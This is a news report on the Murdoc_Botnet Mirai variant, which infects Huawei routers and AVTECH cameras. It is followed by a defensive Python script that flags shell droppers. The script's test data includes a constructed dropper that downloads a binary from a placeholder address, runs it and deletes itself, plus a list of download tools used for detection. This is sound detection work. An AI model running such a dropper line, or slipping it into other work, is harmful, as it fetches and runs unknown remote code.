New Mirai variant targets routers from Huawei


Huawei routers and AVTECH cameras are being infected by a new variant of the Mirai botnet.

Researchers from cybersecurity firm Qualys Inc. are warning of a new variant of the Mirai botnet called “Murdoc_Botnet.” This malware targets vulnerabilities in AVTECH cameras and Huawei HG523 routers and has already infected at least 1,300 devices worldwide. Affected devices have been identified particularly in Malaysia, Thailand, Mexico and Indonesia.

Distributed by bash scripts

As with other Mirai variants, the goal of Murdoc_Botnet is to infect as many devices as possible and create extensive bot networks. According to Qualys, the malware uses ELF files and shell scripts to infiltrate devices. The scripts exploit vulnerabilities such as CVE-2024-7029 and CVE-2017-17215 to install malicious software and connect to command-and-control (C&C) servers, SiliconANGLE writes.

The infrastructure consists of more than 100 C&C servers, which control infected devices, enabling the spread of malware. IoT devices such as cameras and routers are a particular target of this type of attack, as they often remain unprotected and vulnerabilities are not patched.

Murdoc_Botnet spreads via bash scripts that download and execute malware. After execution, any trace of the scripts is automatically deleted. Qualys advises companies to monitor suspicious processes and network traffic and to be careful with unknown shell scripts. Regular updates of systems and firmware are crucial to prevent infections.
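The advice to be careful with unknown shell scripts can be applied as a static check before a script is ever run. The following is an added example, not code from Qualys or the original article: it flags the download, execute, delete sequence described above. The tool list, sample scripts, address and file names are constructed assumptions.

```python
import re
import shlex

FETCHERS = {"wget", "curl", "tftp", "ftpget"}  # assumed list of download tools
# Constructed samples (TEST-NET address, made-up file names), not real malware.
DROPPER_SAMPLE = '''#!/bin/sh
cd /tmp
wget http://192.0.2.10/sample.arm; chmod 777 sample.arm; ./sample.arm
rm -f sample.arm
rm -f "$0"
'''
BENIGN_SAMPLE = '''#!/bin/sh
curl -o /tmp/release.tar.gz https://example.com/release.tar.gz
tar -xzf /tmp/release.tar.gz -C /opt/app
'''

def base(path):
    return path.rstrip("/").rsplit("/", 1)[-1]  # last component of path or URL

def commands(script):
    """Yield the token list of each simple command in the script."""
    for line in script.splitlines():
        if line.strip().startswith("#"):
            continue
        for part in re.split(r";|&&|\|\||\|", line):
            try:
                tokens = shlex.split(part)
            except ValueError:  # unbalanced quotes: fall back to whitespace
                tokens = part.split()
            if tokens:
                yield tokens

def triage(script):
    """Report files the script downloads, runs, and deletes afterwards."""
    fetched, ran, wiped, self_delete = set(), set(), set(), False
    for tokens in commands(script):
        cmd = base(tokens[0])
        args = [a for a in tokens[1:] if not a.startswith("-")]
        names = {base(a) for a in args}
        if cmd in FETCHERS:
            fetched |= names
        elif cmd in {"sh", "bash"}:
            ran |= names & fetched          # interpreter run on a fetched file
        elif "/" in tokens[0] and cmd in fetched:
            ran.add(cmd)                    # direct run, e.g. ./sample.arm
        elif cmd == "rm":
            wiped |= names & ran            # payload removed after execution
            self_delete = self_delete or "$0" in args  # script removes itself
    return dict(fetched=sorted(fetched), ran=sorted(ran), wiped=sorted(wiped),
                self_delete=self_delete, suspicious=bool(wiped) or (bool(ran) and self_delete))
```

This is a static heuristic: commands built from variables or encoded strings will not match, so it complements process and network monitoring rather than replacing it.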